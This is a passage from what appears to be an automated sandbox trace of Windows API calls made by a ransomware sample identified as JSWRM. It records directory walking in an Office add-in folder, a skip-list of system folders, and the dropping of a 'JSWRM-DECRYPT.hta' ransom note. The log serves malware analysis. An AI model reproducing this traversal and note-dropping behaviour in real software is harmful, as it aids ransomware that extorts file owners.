hHeap=0x1e0000) returned 1 [0123.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0123.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.037] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c164a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6866e01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6866e01, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="da", cAlternateFileName="")) returned 1 [0123.037] lstrcmpiW (lpString1="da", lpString2=".") returned 1 [0123.037] lstrcmpiW (lpString1="da", lpString2="..") returned 1 [0123.037] lstrcmpiW (lpString1="da", lpString2="...") returned 1 [0123.037] lstrcmpiW (lpString1="da", lpString2="windows") returned -1 [0123.037] lstrcmpiW (lpString1="da", lpString2="recovery") returned -1 [0123.037] lstrcmpiW (lpString1="da", lpString2="perflogs") returned -1 [0123.037] lstrcmpiW (lpString1="da", lpString2="documents and settings") returned -1 [0123.037] lstrcmpiW (lpString1="da", lpString2="$RECYCLE.BIN") returned 1 [0123.037] lstrcmpiW (lpString1="da", lpString2="system volume information") returned -1 [0123.037] lstrcmpiW (lpString1="da", lpString2="msocache") returned -1 [0123.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0123.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.038] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\da\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\da\\jswrm-decrypt.hta")) returned 0xffffffff [0123.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0123.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0123.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0123.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0123.039] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\da\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\da\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.039] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.039] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.040] CloseHandle (hObject=0x338) returned 1 [0123.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0123.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0123.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0123.041] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\da\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\da\\jswrm-decrypt.hta")) returned 0x20 [0123.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0123.041] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\da\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c164a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6866e01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3fff7248, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0123.041] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.041] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c164a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6866e01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3fff7248, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.041] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.041] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.041] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fff7248, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3fff7248, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3fff7248, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.041] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.041] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.041] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.041] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.041] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.041] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.041] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.041] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.041] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.041] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0123.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0123.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0123.042] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x605aed7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x605aed7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6081126, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.042] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.042] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.042] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.042] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.042] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.042] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.042] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.042] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.042] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.042] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0123.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0123.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0123.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0123.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21be68 [0123.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.042] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56d17f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56d17f1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56d17f1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x26aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.042] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.042] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.042] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.042] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.043] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.043] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.043] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.043] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.043] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.043] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0123.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0123.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0123.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0123.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x23aa80 [0123.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21be68 | out: hHeap=0x1e0000) returned 1 [0123.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.043] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6866e01, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6866e01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6866e01, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.043] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.043] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.043] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.043] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.043] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.043] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.043] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.043] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.043] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.043] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21be68 [0123.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0123.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.044] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5c164a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5c164a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5c164a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.044] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.044] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.044] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.044] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.044] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.044] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.044] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.044] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.044] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.044] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0123.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0123.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0123.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 